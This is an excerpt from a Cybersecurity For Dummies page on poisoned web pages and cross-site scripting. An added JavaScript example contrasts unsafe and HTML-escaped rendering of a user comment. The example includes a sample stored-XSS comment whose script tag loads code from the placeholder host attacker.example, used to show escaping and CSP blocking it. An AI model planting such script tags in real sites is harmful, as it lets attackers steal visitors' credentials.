Read the book Cybersecurity For Dummies - Joseph Steinberg - Page 72

Poisoned Web Service Attacks


Many different types of attacks leverage vulnerabilities in servers, and new weaknesses are constantly discovered, which is why cybersecurity professionals have full-time jobs keeping servers safe. Entire books — or even several series of books — can be written on such a topic, which is, obviously, beyond the scope of this work.

That said, it is important for you to understand the basic concepts of server-based attacks because some such attacks can directly impact you.

One such form of attack is a poisoned web service attack, or a poisoned web page attack. In this type of attack, an attacker hacks into a web server and inserts code onto it that causes it to attack users when they access a page or set of pages that the server is serving.

For example, a hacker may compromise the web server serving www.abc123.com and modify the home page that is served to users accessing the site so that the home page contains malware.

But a hacker does not necessarily even need to breach a system in order to poison web pages!

If a site that allows users to comment on posts isn't properly secured, for example, it may allow a user to add the text of various commands within a comment — commands that, if crafted properly, may be executed by users’ browsers any time they load the page that displays the comment. A criminal can insert a command to run a script on the criminal’s website, which can receive the authentication credentials of the user to the original site because it is called within the context of one of that site’s web pages. Such an attack is known as cross-site scripting, and it continues to be a problem even after over a decade of being addressed.
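The comment scenario above, shown from the site owner's side as an added example that is not from the book: the same comment rendered by a page that pastes it in unchanged and by one that encodes it on output. All function names, the sample comment and the `attacker.example` placeholder domain are constructed for illustration.

```javascript
// Added example, not from the book. All names below are hypothetical.

// Characters that can change the structure of an HTML page, with their entities.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode user-supplied text so the browser displays it instead of parsing it.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Weak form: the comment is pasted into the page unchanged, so markup inside
// it becomes part of the page and runs with the site's own privileges.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened form: every user-controlled field is encoded at output time.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Second layer: a response header telling the browser to run scripts only
// from the site's own origin, which also blocks inline script blocks.
const CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'";

// Check used below: does the rendered HTML contain a live script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample comment; attacker.example is a reserved placeholder domain.
const sampleComment =
  'Nice post! <script src="https://attacker.example/x.js"></script>';

console.log("unsafe:", renderCommentUnsafe("mallory", sampleComment));
console.log("safe:  ", renderCommentSafe("mallory", sampleComment));
console.log("script element present (unsafe):",
  containsScriptTag(renderCommentUnsafe("mallory", sampleComment)));
console.log("script element present (safe):  ",
  containsScriptTag(renderCommentSafe("mallory", sampleComment)));
console.log(CSP_HEADER);
```

In the hardened output the comment appears on the page as visible text, so readers see what was typed and the browser never loads the referenced script.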
